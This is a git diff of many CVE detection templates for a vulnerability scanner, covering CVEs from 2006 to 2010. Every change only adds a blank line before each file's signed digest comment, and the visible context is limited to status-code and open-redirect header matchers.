b/http/cves/2006/CVE-2006-2842.yaml index c4c50d48f4..33f236f4a4 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022001e89f7cc7dd32b63ee47ec2760bcaa05f299c9707501c2de6a880e1498e538c022100c9a98cd8eafde8774129532d9abe8e789db6b296111d35039abd5be3faffab9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022001e89f7cc7dd32b63ee47ec2760bcaa05f299c9707501c2de6a880e1498e538c022100c9a98cd8eafde8774129532d9abe8e789db6b296111d35039abd5be3faffab9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index e90b57e536..d2de2497c7 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220538068b7ea5813a76ce99ece120d971b886fbb5fdb8d455a6145a581f6a5cec402207401b629d993694f3a1c9c7d039a12dda1156a9ff01a213aaf80916abd4b94da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220538068b7ea5813a76ce99ece120d971b886fbb5fdb8d455a6145a581f6a5cec402207401b629d993694f3a1c9c7d039a12dda1156a9ff01a213aaf80916abd4b94da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 5d67fc2762..fb784473be 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca91884f4234058f8fd2cc20aa675f8e6e0cefed686fc0a9e1037408eb3d96b9022100d96cbd7bf93b8a7d3bbe6ce133f32b542b098b3e460d00adea1265877fee07ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ca91884f4234058f8fd2cc20aa675f8e6e0cefed686fc0a9e1037408eb3d96b9022100d96cbd7bf93b8a7d3bbe6ce133f32b542b098b3e460d00adea1265877fee07ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index e14aefb1ce..f16881e56e 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047f85c2902fee7a934a0b153a732dfc66c3b5f27184b0e633fe6d5582ea9a75d022100fb1c13ab0bd86f0367cfe54665ea802f9e67ea34ca3b43913b1a3e544161ec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022047f85c2902fee7a934a0b153a732dfc66c3b5f27184b0e633fe6d5582ea9a75d022100fb1c13ab0bd86f0367cfe54665ea802f9e67ea34ca3b43913b1a3e544161ec9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 87280e1797..b7b50caea5 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009332201c12f719a3847de74a8ee8dd632abf399abab370062b1deaec99bfe51e022100d440d7bd3c3406ecdb8f29817b2663cbda7f286bf850641c096b40b5f946d562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009332201c12f719a3847de74a8ee8dd632abf399abab370062b1deaec99bfe51e022100d440d7bd3c3406ecdb8f29817b2663cbda7f286bf850641c096b40b5f946d562:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 1e4672211b..38dfe43c55 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b156d151a978c56d22c1254d62454d581f5ee5c8c7086e8feeca6c370404c1902204bdb2d6ec0a2df1d79800198d9f52ab9e5aedd1d2415a895116d02a74e8cbe73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206b156d151a978c56d22c1254d62454d581f5ee5c8c7086e8feeca6c370404c1902204bdb2d6ec0a2df1d79800198d9f52ab9e5aedd1d2415a895116d02a74e8cbe73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 0af325d28d..32bc316ca2 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100c42b4f6da1b7a788b55abb40c5a88c4d89e073afa38fa15dadb62d66817f54af022100be1c0ed7b8f01b0a3135429252000c4503936d260eccfb1ae725065157cb9f86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c42b4f6da1b7a788b55abb40c5a88c4d89e073afa38fa15dadb62d66817f54af022100be1c0ed7b8f01b0a3135429252000c4503936d260eccfb1ae725065157cb9f86:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 8faf76aaef..33e4e63ff3 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f82a3b0a9ed7102a6deac6b0fc823558975b7ab1089f0a21c4e194ad485b8826022100bef9aa4244ae9eccb2e209cf4c78fa701051e7b4eff244e92e11fc8ceecbfe70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f82a3b0a9ed7102a6deac6b0fc823558975b7ab1089f0a21c4e194ad485b8826022100bef9aa4244ae9eccb2e209cf4c78fa701051e7b4eff244e92e11fc8ceecbfe70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 1b032defdc..edc52bbe16 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d452bda9ae2bbd8e1a8b4f607aef15e5af8442d3105e091c271c8649728540d502207e90cbc2d3d7f76c908ef3481fae31ea6d4707dc7f6be652bf6b3fc35fa43f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d452bda9ae2bbd8e1a8b4f607aef15e5af8442d3105e091c271c8649728540d502207e90cbc2d3d7f76c908ef3481fae31ea6d4707dc7f6be652bf6b3fc35fa43f3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index e2b5c92f41..491cf520fb 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068da4be622848d8e90fbbd5121f1a01d2d9af386eb40ca08158438599d52529e022100f6e17ca26da5ae8312fb41f788efa9546ac132ba613c8efb1f2d0e080507d8d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022068da4be622848d8e90fbbd5121f1a01d2d9af386eb40ca08158438599d52529e022100f6e17ca26da5ae8312fb41f788efa9546ac132ba613c8efb1f2d0e080507d8d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 84f3c7433b..27ed91ba43 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220279d9ec99d1a0998625c3223ef0e81de0e6ea8b512f0a7b90924088ef64d0593022100b9e94db852a643bc6d8c331a738237007f238e1d31d75fa09ec36b93530f41a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220279d9ec99d1a0998625c3223ef0e81de0e6ea8b512f0a7b90924088ef64d0593022100b9e94db852a643bc6d8c331a738237007f238e1d31d75fa09ec36b93530f41a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index a93d3d520b..14e69ff0d4 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022026459db489e42e3e525ad7ef16ca115c090a585c931855d2435631cce756267d02203edae3bad928a9b48c1e9f93b344467941a557e5591fcacfc5d3ae70da877ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022026459db489e42e3e525ad7ef16ca115c090a585c931855d2435631cce756267d02203edae3bad928a9b48c1e9f93b344467941a557e5591fcacfc5d3ae70da877ceb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 9fe92f8ff8..7d80b4801c 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a93c28b786b09aa3a14d05896b66a18c192a74bf2f385269f48199fc81dae5c0220363230840765085feb645eac5f4f44a4cc1b602ae6b0ace6410e3d203da7de65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009a93c28b786b09aa3a14d05896b66a18c192a74bf2f385269f48199fc81dae5c0220363230840765085feb645eac5f4f44a4cc1b602ae6b0ace6410e3d203da7de65:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index dfb3ec1742..e66ec43fd7 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008877ae9a49f6a0cda67272ed0c23a0acc8ad2a75fe9c6570e240a3d9a62d8065022068d83ccbd76631543b8048045b4de50fdefc3494a94bf3e7d98d2833d454d00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008877ae9a49f6a0cda67272ed0c23a0acc8ad2a75fe9c6570e240a3d9a62d8065022068d83ccbd76631543b8048045b4de50fdefc3494a94bf3e7d98d2833d454d00f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index c5be7c4bba..191b687d51 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201041b14b82127c13a4e400a737b7c644862d374292413b3d54d2426fa3e5634e022100a29593d2ada8d40946414e88548b6276f96e9b59a7e273235d0a1514629e45b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201041b14b82127c13a4e400a737b7c644862d374292413b3d54d2426fa3e5634e022100a29593d2ada8d40946414e88548b6276f96e9b59a7e273235d0a1514629e45b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index c0af279074..98999e67a7 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205cf996a5d677243e686065098b6ea44b550f74f0d03f8c866ce94ead21c98abd022100b08c89ea4e17df7d4c7b1dc077edab23966abe7d2e28e70304545dd6e2f7b81d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205cf996a5d677243e686065098b6ea44b550f74f0d03f8c866ce94ead21c98abd022100b08c89ea4e17df7d4c7b1dc077edab23966abe7d2e28e70304545dd6e2f7b81d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 092ec947c0..14a1333806 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100de8ea647013a85fbb39e6074eb5e5349fc989c141cd495ec86f07adf61f8002802202025177e67eeb9071322483b5343f68f3f294836dc25419dca24d635fb6fc870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100de8ea647013a85fbb39e6074eb5e5349fc989c141cd495ec86f07adf61f8002802202025177e67eeb9071322483b5343f68f3f294836dc25419dca24d635fb6fc870:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index a3da9beb37..1a5d8bd7c5 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022077908217c7bacb80b633395f2ef169f0f87dcfbc53b6787d5156951aee659b6b02207864c954ff5bb748eb7e42c55a856dffc2f0048ffd36bfd380b188e40ffc9957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022077908217c7bacb80b633395f2ef169f0f87dcfbc53b6787d5156951aee659b6b02207864c954ff5bb748eb7e42c55a856dffc2f0048ffd36bfd380b188e40ffc9957:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 461a1f38d1..6b2223c646 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100bdfc38692c41c428338866cf2e060b1ab3e7b4430bd851d5216a717196152870022100cae80a372d65bf844969cd1ca8f8592622496104beb6813af509876fe874e1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bdfc38692c41c428338866cf2e060b1ab3e7b4430bd851d5216a717196152870022100cae80a372d65bf844969cd1ca8f8592622496104beb6813af509876fe874e1d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 8ea1330a07..645402e481 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220125b9a9d6cf793feeebdb90906331ccbdb34aa90ac5e29e87a6c1e88901dcc8002200d7cfbdf37435888f92b5a000a2b1ddbbfa3bc93a0d10ed6d031563d9b0fc0ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220125b9a9d6cf793feeebdb90906331ccbdb34aa90ac5e29e87a6c1e88901dcc8002200d7cfbdf37435888f92b5a000a2b1ddbbfa3bc93a0d10ed6d031563d9b0fc0ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index b18cb272d3..347320501d 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100abfd970f50963383a3752e5b4e655e64d5e24a9be8759b290c71b8c43f35fea2022028c0a99349bc1a5d7b8231568e9ffdfe9cdf154bd7ed0d7e26d8419463996483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100abfd970f50963383a3752e5b4e655e64d5e24a9be8759b290c71b8c43f35fea2022028c0a99349bc1a5d7b8231568e9ffdfe9cdf154bd7ed0d7e26d8419463996483:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 1cd958a417..d7599f54fd 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205dfe627123b0d4a95c173566ec93f62c7fa35de8c516441ecf08b646bc51c5090220599aa3fbc08cc15d749706785f40d3643fc1e4e0a20bb90a741946ec9f0df3cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205dfe627123b0d4a95c173566ec93f62c7fa35de8c516441ecf08b646bc51c5090220599aa3fbc08cc15d749706785f40d3643fc1e4e0a20bb90a741946ec9f0df3cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index d5ec522440..39d414f2f6 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a9ed566dc7429ec96481a086d324097be5c591c17863b29b26cf372bd60cb731022100ebb4304f0c45dc1d30b2baf3f8164637c6cf81bc55dca21fb7cbc2a6c477e5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a9ed566dc7429ec96481a086d324097be5c591c17863b29b26cf372bd60cb731022100ebb4304f0c45dc1d30b2baf3f8164637c6cf81bc55dca21fb7cbc2a6c477e5c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 013765c7f3..7c698fae0c 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a11099b17117929bac9c7103b4ff4de76d727ea1069b9a0cceeb9d1784a1a67302202f9a0479f7abb366e271596c2474fb29bde94bd2580ae140c81570826b64f30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a11099b17117929bac9c7103b4ff4de76d727ea1069b9a0cceeb9d1784a1a67302202f9a0479f7abb366e271596c2474fb29bde94bd2580ae140c81570826b64f30b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 588a03f58f..1394f47441 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ef0b145d959d59c58c2397efbd8a022bdd5e3350b782bad64bb9d9b3c8bbb930221009230c0d9c5ddb827b8f9f8f56ca5970f50c4f6c3e3e39276d6e00235191177dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202ef0b145d959d59c58c2397efbd8a022bdd5e3350b782bad64bb9d9b3c8bbb930221009230c0d9c5ddb827b8f9f8f56ca5970f50c4f6c3e3e39276d6e00235191177dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index e870c8336f..00271dd6e7 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3df5c87c9dbf9e394e75bca7ee4e8ccbd91df50311c04b094d46420d79f76bf02203414ba93dfecc87be8ac750691bc7a6dd4a2f562fe372c95c564cd7a756c551e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e3df5c87c9dbf9e394e75bca7ee4e8ccbd91df50311c04b094d46420d79f76bf02203414ba93dfecc87be8ac750691bc7a6dd4a2f562fe372c95c564cd7a756c551e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index e83a1aa398..3b9089035a 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a4d0128e0e978f578cf856041204228eff848f3831ab5ca5addf0fdf3b1b1772022000926422ac4e990f1e75ae8d97e10c2292c11cda067c8a585e0bc3eea9e25081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a4d0128e0e978f578cf856041204228eff848f3831ab5ca5addf0fdf3b1b1772022000926422ac4e990f1e75ae8d97e10c2292c11cda067c8a585e0bc3eea9e25081:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index adad866fd9..edf93196b1 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204082b3d74c9eecbb163a0882f83e4651fa21ff5b88a0bb352670001ab805cb11022100ff86f6429361555c5e6b8f96d3692087c0b38fae44b1993f0aa45758c4086a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204082b3d74c9eecbb163a0882f83e4651fa21ff5b88a0bb352670001ab805cb11022100ff86f6429361555c5e6b8f96d3692087c0b38fae44b1993f0aa45758c4086a6d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index ecb443e80a..d4c2c638d2 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220610626457b4099ed89e4cf33a091ea8079abb5853d1ba048f4a2672971697b7002203a3476b69a5d87c52029566af133c6415ce46e454f994f9b161a726624608b03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220610626457b4099ed89e4cf33a091ea8079abb5853d1ba048f4a2672971697b7002203a3476b69a5d87c52029566af133c6415ce46e454f994f9b161a726624608b03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index fe6bb4c5f5..6d09b3716f 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022073d1ef090f6d39a3f0f4d2239ae46b45b55f55e5de00325a2d9b30bfd6ae6e68022100fb0a7f3dddc0a529c818a65e922fffd4669dd9499464a1a9a1e33ffc5b0975aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022073d1ef090f6d39a3f0f4d2239ae46b45b55f55e5de00325a2d9b30bfd6ae6e68022100fb0a7f3dddc0a529c818a65e922fffd4669dd9499464a1a9a1e33ffc5b0975aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index a790375b82..82e5cac9d0 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd843f3d182c2b282d9730dd4214c3681562eced8f39441903e53d66f5f55fcb022072f2c1cbfb4ef3f5af6fd9ec9470f2f5a45a4100360a4c36a7fae59b53106daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bd843f3d182c2b282d9730dd4214c3681562eced8f39441903e53d66f5f55fcb022072f2c1cbfb4ef3f5af6fd9ec9470f2f5a45a4100360a4c36a7fae59b53106daa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 5c2f099e1b..1b3f2dd3dc 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402205bf3ba1c5f896e7ed5c6453241ed06dea41f37d429a126bd9228cbefae6362c402203aede0803c239f8bd5b194e33f8a6262b8a4d5ff4bd6e11cc9d57aa83f750d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205bf3ba1c5f896e7ed5c6453241ed06dea41f37d429a126bd9228cbefae6362c402203aede0803c239f8bd5b194e33f8a6262b8a4d5ff4bd6e11cc9d57aa83f750d37:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 8596dcddab..a6c5a374a2 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022063d9c355926d7cfeacdd3879910ecdb142ec63ce9beee3f899ba1868e8e4f9e702205d348adbf1ca2d19eaf386b269aa5906641fb6096279eb4ced70ebf7a3c710d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022063d9c355926d7cfeacdd3879910ecdb142ec63ce9beee3f899ba1868e8e4f9e702205d348adbf1ca2d19eaf386b269aa5906641fb6096279eb4ced70ebf7a3c710d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 948d3e90dd..e0e8d6f92d 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100950fa4a40d8a9bb62e57e7f581200046302ea6a7ef7ce20eda1fa41abef8899f02210083847c726e6c617a491da359937532e7e5efc03cec9a04dc1242bc15f34298c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100950fa4a40d8a9bb62e57e7f581200046302ea6a7ef7ce20eda1fa41abef8899f02210083847c726e6c617a491da359937532e7e5efc03cec9a04dc1242bc15f34298c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index ee671fd49c..bad9d56355 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b60640d3d9c3c754bdbe52455d59497aec8d585c5b406a3e1ee1b779813ca463022100a4dec002df889af911f3a14d3435fee6054b116249db3c239a73d7aee7ef5aa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b60640d3d9c3c754bdbe52455d59497aec8d585c5b406a3e1ee1b779813ca463022100a4dec002df889af911f3a14d3435fee6054b116249db3c239a73d7aee7ef5aa0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 0773a9e399..32374e4151 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220257e3a926ed1fc71c273f36615221c7dd3e2d460618ea7de4b8f274759401471022006dcee7c22cdc686d57b5d0f4422f9ea7bc8527559a79cedebde6d801eccc1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220257e3a926ed1fc71c273f36615221c7dd3e2d460618ea7de4b8f274759401471022006dcee7c22cdc686d57b5d0f4422f9ea7bc8527559a79cedebde6d801eccc1cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 34460b3739..2921fc7faf 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cf8aaf42dd413a52879f6955e02ae2cd47d8f26f14c6483098028a7dd26f3df022100f0b9faf5049befd71463c5c03e1483562066aa710d7fa636c72081c50d514f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 